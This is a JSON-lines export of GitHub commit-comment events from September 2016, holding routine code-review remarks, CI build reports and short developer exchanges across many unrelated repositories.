{"id":"4566025475","type":"CommitCommentEvent","actor":{"login":"yunsup"},"repo":{"name":"ucb-bar/rocket-chip"},"payload":{"comment":{"id":19030334,"position":null,"line":null,"path":null,"commit_id":"f95b8c4ec2bcde5cb7a1df18b99906e446d3ddb9","created_at":"2016-09-15T04:20:02Z","updated_at":"2016-09-15T04:20:02Z","body":"If you were going to parameterize MODEL, why didn't you get rid of PROJECT?"}},"created_at":"2016-09-15T04:20:02Z"}
{"id":"4566028125","type":"CommitCommentEvent","actor":{"login":"USA-RedDragon"},"repo":{"name":"CyanogenMod/android_device_oneplus_oneplus3"},"payload":{"comment":{"id":19030342,"position":null,"line":null,"path":null,"commit_id":"acab5c6062b06453f591f24b7ef1e8b609e4b3a8","created_at":"2016-09-15T04:21:12Z","updated_at":"2016-09-15T04:21:12Z","body":"You okay buddy? Seems like you forgot something"}},"created_at":"2016-09-15T04:21:12Z"}
{"id":"4566028717","type":"CommitCommentEvent","actor":{"login":"JosephSM"},"repo":{"name":"alexmancheno/OOP-in-C-Course-Assignments"},"payload":{"comment":{"id":19030344,"position":null,"line":null,"path":null,"commit_id":"8f89ef4696a077c8e819a838241cbd071b1fdd5d","created_at":"2016-09-15T04:21:30Z","updated_at":"2016-09-15T04:21:30Z","body":"Hey sorry\r\njust got home. so u may not realize this but q[8] is actually being referenced somewhere in memory and on each loop will fail the horizontal condition until it reaches q[8] == 8 in which case itll c--.\r\n \r\n"}},"created_at":"2016-09-15T04:21:30Z"}
{"id":"4566030472","type":"CommitCommentEvent","actor":{"login":"JosephSM"},"repo":{"name":"alexmancheno/OOP-in-C-Course-Assignments"},"payload":{"comment":{"id":19030353,"position":null,"line":null,"path":null,"commit_id":"8f89ef4696a077c8e819a838241cbd071b1fdd5d","created_at":"2016-09-15T04:22:21Z","updated_at":"2016-09-15T04:22:21Z","body":"look at the code i sent u again\r\ni added some couts to make it clearer"}},"created_at":"2016-09-15T04:22:21Z"}
{"id":"4566031725","type":"CommitCommentEvent","actor":{"login":"janisozaur"},"repo":{"name":"OpenRCT2/OpenRCT2"},"payload":{"comment":{"id":19030357,"position":null,"line":null,"path":null,"commit_id":"aff5975dfeeeee55803a9d58237bd3a295773fa5","created_at":"2016-09-15T04:22:53Z","updated_at":"2016-09-15T04:22:53Z","body":"You missed a spot at line 258"}},"created_at":"2016-09-15T04:22:53Z"}
{"id":"4566033146","type":"CommitCommentEvent","actor":{"login":"OmarACY"},"repo":{"name":"OmarACY/cinemax"},"payload":{"comment":{"id":19030362,"position":null,"line":null,"path":null,"commit_id":"8c0dcdfaf67980aa6c249ab7f2ae75d3fc5cedcc","created_at":"2016-09-15T04:23:30Z","updated_at":"2016-09-15T04:23:30Z","body":"Iniciando"}},"created_at":"2016-09-15T04:23:30Z"}
{"id":"4566037216","type":"CommitCommentEvent","actor":{"login":"ajendrex"},"repo":{"name":"dcartagena1/base-django-project"},"payload":{"comment":{"id":19030371,"position":8,"line":17,"path":"apps/conta/models.py","commit_id":"fc8f4e12e476dec352fc4d06ecf03dd700c19807","created_at":"2016-09-15T04:25:21Z","updated_at":"2016-09-15T04:25:21Z","body":"En lugar de CharField, considera la posibilidad de usar [EmailField](https://docs.djangoproject.com/en/1.10/ref/models/fields/#emailfield), así el correo que ingresa el usuario se valida automáticamente."}},"created_at":"2016-09-15T04:25:21Z"}
{"id":"4566037696","type":"CommitCommentEvent","actor":{"login":"Xadeka"},"repo":{"name":"BeTheTeam/SeniorProjectF2016"},"payload":{"comment":{"id":19030373,"position":null,"line":null,"path":null,"commit_id":"080abce214d05d21eded1601ce5dbcf121e3b422","created_at":"2016-09-15T04:25:33Z","updated_at":"2016-09-15T04:25:33Z","body":"Thank goodness it finally worked\r\n\r\nFirst day developing"}},"created_at":"2016-09-15T04:25:33Z"}
{"id":"4566040159","type":"CommitCommentEvent","actor":{"login":"stevage"},"repo":{"name":"TerriaJS/terriajs"},"payload":{"comment":{"id":19030381,"position":8,"line":56,"path":"lib/Models/WebProcessingServiceCatalogFunction.js","commit_id":"a1a9265f57299eff87d80e162d0dcc27caeddb40","created_at":"2016-09-15T04:26:43Z","updated_at":"2016-09-15T04:26:43Z","body":"You might consider `urlDelimiter` or `parameterDelimiter` rather than just `delimiter`. Also, should document the default (`;`)"}},"created_at":"2016-09-15T04:26:43Z"}
{"id":"4566041506","type":"CommitCommentEvent","actor":{"login":"MatthewJA"},"repo":{"name":"chengsoonong/crowdastro"},"payload":{"comment":{"id":19030384,"position":null,"line":null,"path":null,"commit_id":"3b087a01684d4fa724562a421b52e551797228a1","created_at":"2016-09-15T04:27:20Z","updated_at":"2016-09-15T04:27:20Z","body":"I'll push this through to PyPI."}},"created_at":"2016-09-15T04:27:20Z"}
{"id":"4566041531","type":"CommitCommentEvent","actor":{"login":"stevage"},"repo":{"name":"TerriaJS/terriajs"},"payload":{"comment":{"id":19030387,"position":46,"line":594,"path":"lib/Models/WebProcessingServiceCatalogFunction.js","commit_id":"a1a9265f57299eff87d80e162d0dcc27caeddb40","created_at":"2016-09-15T04:27:20Z","updated_at":"2016-09-15T04:27:20Z","body":"Eep. That's gross.\r\n\r\n(You should probably put your name in, since you're writing \"I\")"}},"created_at":"2016-09-15T04:27:20Z"}
{"id":"4566043728","type":"CommitCommentEvent","actor":{"login":"stevage"},"repo":{"name":"TerriaJS/terriajs"},"payload":{"comment":{"id":19030389,"position":20,"line":558,"path":"lib/Models/WebProcessingServiceCatalogFunction.js","commit_id":"a1a9265f57299eff87d80e162d0dcc27caeddb40","created_at":"2016-09-15T04:28:16Z","updated_at":"2016-09-15T04:28:16Z","body":"You could write `var delimiter = defaultValue(catalogFunction.delimiter, ';');`"}},"created_at":"2016-09-15T04:28:16Z"}
{"id":"4566043751","type":"CommitCommentEvent","actor":{"login":"ajendrex"},"repo":{"name":"dcartagena1/base-django-project"},"payload":{"comment":{"id":19030390,"position":8,"line":17,"path":"apps/conta/models.py","commit_id":"fc8f4e12e476dec352fc4d06ecf03dd700c19807","created_at":"2016-09-15T04:28:17Z","updated_at":"2016-09-15T04:28:17Z","body":"Es buena práctica evitar poner **-** en nombres de variables. Esta variable podría llamarse `correo_electronico`."}},"created_at":"2016-09-15T04:28:17Z"}
{"id":"4566045217","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":19030393,"position":null,"line":null,"path":null,"commit_id":"81cb70a8cae681c70e3b1adb276d0ef93da3fc64","created_at":"2016-09-15T04:28:58Z","updated_at":"2016-09-15T04:28:58Z","body":"日本語版：スイッチングハブ章：OVS のテーブルミスフローエントリに関する記載を削除します。\r\n\r\nOVS は v2.1.0 でOpenFlow 1.3 のテーブルミスフローエントリをフルにサポートしました。\r\n\r\nこのパッチは、OVS のテーブルミスフローエントリに関する記載を削除します。"}},"created_at":"2016-09-15T04:28:58Z"}
{"id":"4566049383","type":"CommitCommentEvent","actor":{"login":"kkrysiak"},"repo":{"name":"fgomez02/useful_code"},"payload":{"comment":{"id":19030399,"position":238,"line":238,"path":"Survival_Chi_square_5.R","commit_id":"3a36a2fcb7d024e42bddb4876c04bc8541d4afa9","created_at":"2016-09-15T04:30:51Z","updated_at":"2016-09-15T04:30:51Z","body":"This removes samples with NA for outcome but does not remove samples that were not sequenced (at least that we are aware of). We definitely have clinical data on more individuals than we have sequence data for. Given the number of SNPs in the variant list we were given, I doubt any sequenced samples were missed because no variants were called (definitely a concern with capture data when we don't have any confirmation of which samples were actually sequenced)."}},"created_at":"2016-09-15T04:30:51Z"}
{"id":"4566051788","type":"CommitCommentEvent","actor":{"login":"Aericio"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":19030404,"position":null,"line":null,"path":null,"commit_id":"c1070935819eaeaafce99c6cdf1340b6fc090417","created_at":"2016-09-15T04:31:52Z","updated_at":"2016-09-15T04:31:52Z","body":"![image](https://cloud.githubusercontent.com/assets/16523741/18538409/802f9ad6-7aa9-11e6-8a34-9cec9b64ff81.png)\r\n?"}},"created_at":"2016-09-15T04:31:52Z"}
{"id":"4566052321","type":"CommitCommentEvent","actor":{"login":"itig"},"repo":{"name":"itig/hello-world"},"payload":{"comment":{"id":19030405,"position":null,"line":null,"path":null,"commit_id":"97e9660979a9d0d6dac803506e811a4576532be1","created_at":"2016-09-15T04:32:06Z","updated_at":"2016-09-15T04:32:06Z","body":"Hi\r\n"}},"created_at":"2016-09-15T04:32:06Z"}
{"id":"4566053178","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19030407,"position":null,"line":null,"path":null,"commit_id":"d43917d9573d94ed68ba214ff5e72aadbc75e3a0","created_at":"2016-09-15T04:32:26Z","updated_at":"2016-09-15T04:32:26Z","body":"Related to: backdrop/backdrop-issues#2163 "}},"created_at":"2016-09-15T04:32:26Z"}
{"id":"4566053184","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19030408,"position":null,"line":null,"path":null,"commit_id":"42b092a6050d01811cd9cc99620f6a02ce0f6e37","created_at":"2016-09-15T04:32:26Z","updated_at":"2016-09-15T04:32:26Z","body":"Related to: backdrop/backdrop-issues#2163 "}},"created_at":"2016-09-15T04:32:26Z"}
{"id":"4566053192","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19030409,"position":null,"line":null,"path":null,"commit_id":"aecc8c77a2d33f90c494cbb429597134abe68aa2","created_at":"2016-09-15T04:32:27Z","updated_at":"2016-09-15T04:32:27Z","body":"Related to: backdrop/backdrop-issues#2163 "}},"created_at":"2016-09-15T04:32:27Z"}
{"id":"4566053201","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19030410,"position":null,"line":null,"path":null,"commit_id":"00688a4338ca5859fbf18c135b80f53c5ed2d6a8","created_at":"2016-09-15T04:32:27Z","updated_at":"2016-09-15T04:32:27Z","body":"Related to: backdrop/backdrop-issues#1705 "}},"created_at":"2016-09-15T04:32:27Z"}
{"id":"4566053212","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19030411,"position":null,"line":null,"path":null,"commit_id":"40a3507c6d763e73d27afaedbfe5bb0655d802cf","created_at":"2016-09-15T04:32:27Z","updated_at":"2016-09-15T04:32:27Z","body":"Related to: backdrop/backdrop-issues#1705 "}},"created_at":"2016-09-15T04:32:27Z"}
{"id":"4566053219","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19030412,"position":null,"line":null,"path":null,"commit_id":"8eb79bdc5be1117bfd81b6d5f9891f309c784f72","created_at":"2016-09-15T04:32:27Z","updated_at":"2016-09-15T04:32:27Z","body":"Related to: backdrop/backdrop-issues#1503 "}},"created_at":"2016-09-15T04:32:27Z"}
{"id":"4566053221","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19030413,"position":null,"line":null,"path":null,"commit_id":"5fede86b4645806d5564245d842380609000251c","created_at":"2016-09-15T04:32:27Z","updated_at":"2016-09-15T04:32:27Z","body":"Related to: backdrop/backdrop-issues#1568 "}},"created_at":"2016-09-15T04:32:27Z"}
{"id":"4566053229","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19030414,"position":null,"line":null,"path":null,"commit_id":"7b0d95bb42ad31e6b09d6e906283e9069b9340e5","created_at":"2016-09-15T04:32:28Z","updated_at":"2016-09-15T04:32:28Z","body":"Related to: backdrop/backdrop-issues#1568 "}},"created_at":"2016-09-15T04:32:28Z"}
{"id":"4566053242","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19030415,"position":null,"line":null,"path":null,"commit_id":"9a003450c5004390539a38295c751f693a3ea6a3","created_at":"2016-09-15T04:32:28Z","updated_at":"2016-09-15T04:32:28Z","body":"Related to: backdrop/backdrop-issues#1568 "}},"created_at":"2016-09-15T04:32:28Z"}
{"id":"4566053246","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19030416,"position":null,"line":null,"path":null,"commit_id":"b042ea34806ddae8aaa5389ae09ae71b9f0243e8","created_at":"2016-09-15T04:32:28Z","updated_at":"2016-09-15T04:32:28Z","body":"Related to: backdrop/backdrop-issues#1705 "}},"created_at":"2016-09-15T04:32:28Z"}
{"id":"4566053254","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19030417,"position":null,"line":null,"path":null,"commit_id":"5e0a3b80164e8f2631422c13d94a1e95b2bd35a6","created_at":"2016-09-15T04:32:28Z","updated_at":"2016-09-15T04:32:28Z","body":"Related to: backdrop/backdrop-issues#1231 "}},"created_at":"2016-09-15T04:32:28Z"}
{"id":"4566053263","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19030418,"position":null,"line":null,"path":null,"commit_id":"081849e5e33f4940ac0d53bb42a46c4853d80cc4","created_at":"2016-09-15T04:32:28Z","updated_at":"2016-09-15T04:32:28Z","body":"Related to: backdrop/backdrop-issues#2169 "}},"created_at":"2016-09-15T04:32:28Z"}
{"id":"4566053272","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19030419,"position":null,"line":null,"path":null,"commit_id":"8702303571106ac4cc63eaeddd2ae014609b5e31","created_at":"2016-09-15T04:32:29Z","updated_at":"2016-09-15T04:32:29Z","body":"Related to: backdrop/backdrop-issues#1373 "}},"created_at":"2016-09-15T04:32:29Z"}
{"id":"4566053284","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19030420,"position":null,"line":null,"path":null,"commit_id":"9e241e09605994168a58e31c44b1bee9697c6b23","created_at":"2016-09-15T04:32:29Z","updated_at":"2016-09-15T04:32:29Z","body":"Related to: backdrop/backdrop-issues#1373 "}},"created_at":"2016-09-15T04:32:29Z"}
{"id":"4566053293","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19030421,"position":null,"line":null,"path":null,"commit_id":"2c56daac8710602e5a1bb43b01453a14077c4f85","created_at":"2016-09-15T04:32:29Z","updated_at":"2016-09-15T04:32:29Z","body":"Related to: backdrop/backdrop-issues#940 "}},"created_at":"2016-09-15T04:32:29Z"}
{"id":"4566053302","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19030422,"position":null,"line":null,"path":null,"commit_id":"ae47da111438ec590d6070904454a4a67011e0a7","created_at":"2016-09-15T04:32:29Z","updated_at":"2016-09-15T04:32:29Z","body":"Related to: backdrop/backdrop-issues#940 "}},"created_at":"2016-09-15T04:32:29Z"}
{"id":"4566053310","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19030423,"position":null,"line":null,"path":null,"commit_id":"9ab6e43e7af2eab82c506f1f06c261bf74d58e50","created_at":"2016-09-15T04:32:29Z","updated_at":"2016-09-15T04:32:29Z","body":"Related to: backdrop/backdrop-issues#940 "}},"created_at":"2016-09-15T04:32:29Z"}
{"id":"4566058093","type":"CommitCommentEvent","actor":{"login":"thisisdoyin"},"repo":{"name":"thisisdoyin/coursera-test"},"payload":{"comment":{"id":19030432,"position":1,"line":1,"path":"coursera-test","commit_id":"83701c50454df27ff093b159f912922772f90883","created_at":"2016-09-15T04:34:40Z","updated_at":"2016-09-15T04:34:40Z","body":"this is incorrect and needs to be removed\r\n"}},"created_at":"2016-09-15T04:34:40Z"}
{"id":"4566059001","type":"CommitCommentEvent","actor":{"login":"jnmaloof"},"repo":{"name":"jnmaloof/extract-utr"},"payload":{"comment":{"id":19030434,"position":null,"line":null,"path":null,"commit_id":"18e1e464617a8ae83db671e667187001056bb9cf","created_at":"2016-09-15T04:35:07Z","updated_at":"2016-09-15T04:35:07Z","body":"It enables tilde expansion.\r\n\r\nBut then shouldn't I do it for all file inputs?  And shouldn't I then make sure that the glob expansion didn't also include wildcard expansion that gives multiple files?\r\n\r\nHmmm"}},"created_at":"2016-09-15T04:35:07Z"}
{"id":"4566059917","type":"CommitCommentEvent","actor":{"login":"rdengate"},"repo":{"name":"TerriaJS/terriajs"},"payload":{"comment":{"id":19030437,"position":null,"line":null,"path":null,"commit_id":"a1a9265f57299eff87d80e162d0dcc27caeddb40","created_at":"2016-09-15T04:35:29Z","updated_at":"2016-09-15T04:35:29Z","body":"Thanks @stevage! I will make the changes as suggested. "}},"created_at":"2016-09-15T04:35:29Z"}
{"id":"4566063875","type":"CommitCommentEvent","actor":{"login":"autumnboo90"},"repo":{"name":"autumn90baby/proxy-switcher"},"payload":{"comment":{"id":19030441,"position":8,"line":10,"path":"src/package.json","commit_id":"b55b54512c77d064225185cec7932aacbaf82737","created_at":"2016-09-15T04:37:12Z","updated_at":"2016-09-15T04:37:12Z","body":"love"}},"created_at":"2016-09-15T04:37:12Z"}
{"id":"4566064397","type":"CommitCommentEvent","actor":{"login":"swangboy55"},"repo":{"name":"swangboy55/3DEngine"},"payload":{"comment":{"id":19030442,"position":null,"line":null,"path":null,"commit_id":"3513799cb600aa107c693e56383b619092fe4ce6","created_at":"2016-09-15T04:37:27Z","updated_at":"2016-09-15T04:37:27Z","body":"once you complete what you're doing make a PR for this"}},"created_at":"2016-09-15T04:37:27Z"}
{"id":"4566068678","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19030449,"position":7,"line":6,"path":"catalog.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T04:39:26Z","updated_at":"2016-09-15T04:39:26Z","body":"А тут осталась Седона"}},"created_at":"2016-09-15T04:39:26Z"}
{"id":"4566069156","type":"CommitCommentEvent","actor":{"login":"tempest200903"},"repo":{"name":"tempest200903/20160415-immutables-java"},"payload":{"comment":{"id":19030451,"position":36,"line":36,"path":"src/test/java/com/example/project/AppTest.java","commit_id":"988e3f695403e969709e2680ca02de36766f1221","created_at":"2016-09-15T04:39:41Z","updated_at":"2016-09-15T04:39:41Z","body":"@tempest200903 このテストは未実装か？\r\n"}},"created_at":"2016-09-15T04:39:41Z"}
{"id":"4566069601","type":"CommitCommentEvent","actor":{"login":"tempest200903"},"repo":{"name":"tempest200903/20160415-immutables-java"},"payload":{"comment":{"id":19030454,"position":36,"line":36,"path":"src/test/java/com/example/project/AppTest.java","commit_id":"988e3f695403e969709e2680ca02de36766f1221","created_at":"2016-09-15T04:39:53Z","updated_at":"2016-09-15T04:39:53Z","body":"はい。未実装である。"}},"created_at":"2016-09-15T04:39:53Z"}
{"id":"4566070163","type":"CommitCommentEvent","actor":{"login":"tempest200903"},"repo":{"name":"tempest200903/20160415-immutables-java"},"payload":{"comment":{"id":19030455,"position":36,"line":36,"path":"src/test/java/com/example/project/AppTest.java","commit_id":"988e3f695403e969709e2680ca02de36766f1221","created_at":"2016-09-15T04:40:12Z","updated_at":"2016-09-15T04:40:12Z","body":"適切な assert を追加しなさい。"}},"created_at":"2016-09-15T04:40:12Z"}
{"id":"4566071482","type":"CommitCommentEvent","actor":{"login":"zacharykeeton"},"repo":{"name":"danielmiessler/GitHubRating"},"payload":{"comment":{"id":19030458,"position":null,"line":null,"path":null,"commit_id":"559532ca7604ed7f22f48eb1912fee3794245d09","created_at":"2016-09-15T04:40:45Z","updated_at":"2016-09-15T04:40:45Z","body":"\"Number of Followers\" weighted highest with factor of 5?\r\nSkews the outcome to favor popular people/speakers/industry personalities at the expense of some legit high quality coder that has no time to collect followers (not saying that's me).\r\n\r\nfollowers*5 + repos*3 + contribs*1  is a rather dubious operational definition of \"Code Quality\"        "}},"created_at":"2016-09-15T04:40:45Z"}
{"id":"4566073466","type":"CommitCommentEvent","actor":{"login":"sindresorhus"},"repo":{"name":"kevva/imgur-uploader"},"payload":{"comment":{"id":19030460,"position":46,"line":43,"path":"readme.md","commit_id":"eac2f0a535f504a169d04dfe49f0a5367cb9a4a4","created_at":"2016-09-15T04:41:36Z","updated_at":"2016-09-15T04:41:36Z","body":"You've already mentioned the type. I would go with just:\r\n\r\n> Image to upload."}},"created_at":"2016-09-15T04:41:36Z"}
{"id":"4566074585","type":"CommitCommentEvent","actor":{"login":"FFTEAM"},"repo":{"name":"nx111/oscam"},"payload":{"comment":{"id":19030463,"position":null,"line":null,"path":null,"commit_id":"616fe8793175a5dedc35e688bc400b3098570c9e","created_at":"2016-09-15T04:42:07Z","updated_at":"2016-09-15T04:42:07Z","body":"Caid 098C Sky Germany\n\nWhat is still needed ?\n\n2016-09-15 2:06 GMT+02:00 Aim Hi <notifications@github.com>:\n\n> Need more detail.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/nx111/oscam/commit/616fe8793175a5dedc35e688bc400b3098570c9e#commitcomment-19028772>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIQrEHwhR5m_f8nFKdeFK7HWvL9hXryDks5qqIv5gaJpZM4J9Vuh>\n> .\n>\n"}},"created_at":"2016-09-15T04:42:07Z"}
{"id":"4566077345","type":"CommitCommentEvent","actor":{"login":"mljjlm"},"repo":{"name":"AnalogIO/Analog-Tamigo-API"},"payload":{"comment":{"id":19030468,"position":null,"line":null,"path":null,"commit_id":"1b97363a0f1e7429118f0bb1ff662d5c6b819cf8","created_at":"2016-09-15T04:43:18Z","updated_at":"2016-09-15T04:43:18Z","body":"Remember that this change requires client changes from the old settings :-)"}},"created_at":"2016-09-15T04:43:18Z"}
{"id":"4566077392","type":"CommitCommentEvent","actor":{"login":"telic"},"repo":{"name":"telic/comp152"},"payload":{"comment":{"id":19030469,"position":null,"line":null,"path":null,"commit_id":"88dc23d5ac8b5ea3567a7d1e85edd213331389c6","created_at":"2016-09-15T04:43:19Z","updated_at":"2016-09-15T04:43:19Z","body":"It wasn't just the line-height, so `!important` actually wouldn't help much"}},"created_at":"2016-09-15T04:43:19Z"}
{"id":"4566082987","type":"CommitCommentEvent","actor":{"login":"ilkc78"},"repo":{"name":"Lunat1q/Catchem-PoGo"},"payload":{"comment":{"id":19030481,"position":null,"line":null,"path":null,"commit_id":"1aa326148e1e91aa8c1e013c5c3ecaec11cb42b2","created_at":"2016-09-15T04:45:51Z","updated_at":"2016-09-15T04:45:51Z","body":"Hi, is Catchem1.5.3.0 support PokeGo v0.37.0?"}},"created_at":"2016-09-15T04:45:51Z"}
{"id":"4566085314","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19030484,"position":null,"line":null,"path":null,"commit_id":"8b8226a4796b6cc30e977e8d8828d38d92452211","created_at":"2016-09-15T04:46:54Z","updated_at":"2016-09-15T04:46:54Z","body":"makingPrettyTransition (mitchute) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1762 of 1763 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8b8226a4796b6cc30e977e8d8828d38d92452211-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8b8226a4796b6cc30e977e8d8828d38d92452211-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8b8226a4796b6cc30e977e8d8828d38d92452211-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.88%25-green.svg)</a>\n"}},"created_at":"2016-09-15T04:46:54Z"}
{"id":"4566087352","type":"CommitCommentEvent","actor":{"login":"spencerbyw"},"repo":{"name":"ERG-Capstone/EmergencyResponseGuide"},"payload":{"comment":{"id":19030488,"position":24,"line":313,"path":"xdk/EmergencyResponseGuide.xdk","commit_id":"9e2a12a9eaa3e8bb5941856566d586b55ac963a8","created_at":"2016-09-15T04:47:52Z","updated_at":"2016-09-15T04:47:52Z","body":"👍 "}},"created_at":"2016-09-15T04:47:52Z"}
{"id":"4566088709","type":"CommitCommentEvent","actor":{"login":"panlanfeng"},"repo":{"name":"panlanfeng/RFlavor.jl"},"payload":{"comment":{"id":19030489,"position":5,"line":399,"path":"src/List.jl","commit_id":"3c3187db86a6de9fbe952e53f99bf0b708a8664a","created_at":"2016-09-15T04:48:28Z","updated_at":"2016-09-15T04:48:28Z","body":"this should just be \r\ncolumns[j]=col"}},"created_at":"2016-09-15T04:48:28Z"}
{"id":"4566092692","type":"CommitCommentEvent","actor":{"login":"gribozavr"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":19030494,"position":91,"line":2542,"path":"stdlib/public/core/HashedCollections.swift.gyb","commit_id":"15cca80404b26dda40e6bffb70febee1e2a44162","created_at":"2016-09-15T04:50:19Z","updated_at":"2016-09-15T04:50:19Z","body":"Please remove the space before the colon per coding style."}},"created_at":"2016-09-15T04:50:19Z"}
{"id":"4566093488","type":"CommitCommentEvent","actor":{"login":"irwan33"},"repo":{"name":"dariuxmx/Uber-Map-Demo"},"payload":{"comment":{"id":19030495,"position":null,"line":null,"path":null,"commit_id":"01633b1219e1878b16f134869ab116e47860fea2","created_at":"2016-09-15T04:50:40Z","updated_at":"2016-09-15T04:50:40Z","body":"god job.\r\nwhere is file xcodeprodj?"}},"created_at":"2016-09-15T04:50:40Z"}
{"id":"4566094060","type":"CommitCommentEvent","actor":{"login":"ndeloof"},"repo":{"name":"jenkinsci/docker-jnlp-slave"},"payload":{"comment":{"id":19030498,"position":null,"line":null,"path":null,"commit_id":"f6910e7bc3b87774334ac598d940127e8252b79f","created_at":"2016-09-15T04:50:55Z","updated_at":"2016-09-15T04:50:55Z","body":"why didn't he told me and changed MAINTAINER then ?"}},"created_at":"2016-09-15T04:50:55Z"}
{"id":"4566095344","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19030519,"position":null,"line":null,"path":null,"commit_id":"5a365e54deb644b86a634dbb422c67c25bcc6393","created_at":"2016-09-15T04:51:26Z","updated_at":"2016-09-15T04:51:26Z","body":"versionNumbers (mitchute) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5a365e54deb644b86a634dbb422c67c25bcc6393-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-15T04:51:26Z"}
{"id":"4566101208","type":"CommitCommentEvent","actor":{"login":"panlanfeng"},"repo":{"name":"panlanfeng/RFlavor.jl"},"payload":{"comment":{"id":19030529,"position":null,"line":null,"path":null,"commit_id":"3c3187db86a6de9fbe952e53f99bf0b708a8664a","created_at":"2016-09-15T04:54:10Z","updated_at":"2016-09-15T04:54:10Z","body":"thanks for the tests, i'll fix this tomorrow"}},"created_at":"2016-09-15T04:54:10Z"}
{"id":"4566108723","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19030540,"position":136,"line":25,"path":"catalog.html","commit_id":"f1305ce804675c20b893aed08ddbb69c72baf577","created_at":"2016-09-15T04:57:29Z","updated_at":"2016-09-15T04:57:29Z","body":"нужно выделить в отдельный блок эту часть хедера, а уже в нем будет container"}},"created_at":"2016-09-15T04:57:29Z"}
{"id":"4566110044","type":"CommitCommentEvent","actor":{"login":"willpatera"},"repo":{"name":"nathakits/pupil-labs-website"},"payload":{"comment":{"id":19030543,"position":null,"line":null,"path":null,"commit_id":"34fc8d088e45aa4f5cfc3875171bd270cabac6c3","created_at":"2016-09-15T04:58:08Z","updated_at":"2016-09-15T04:58:08Z","body":"This looks good. Make a PR and we can merge it."}},"created_at":"2016-09-15T04:58:08Z"}
{"id":"4566112582","type":"CommitCommentEvent","actor":{"login":"badkangaroo"},"repo":{"name":"openhardwaremonitor/openhardwaremonitor"},"payload":{"comment":{"id":19030548,"position":null,"line":null,"path":null,"commit_id":"f89eb0e578817ec3de6a5d9bcf7177358a3de8b6","created_at":"2016-09-15T04:59:18Z","updated_at":"2016-09-15T04:59:18Z","body":"v 7.1 I'm getting a really high reading off of Temperature #4, not sure if this is a bug or not so i'll attach a screenshot.\r\n![openhardwaremonitor_2016-09-14_21-51-33](https://cloud.githubusercontent.com/assets/1058824/18538769/5350cdb0-7ac6-11e6-86a6-6dc96e2ccc9f.png)\r\nAny ideas? related to the code changes here since it's the board you're adding."}},"created_at":"2016-09-15T04:59:18Z"}
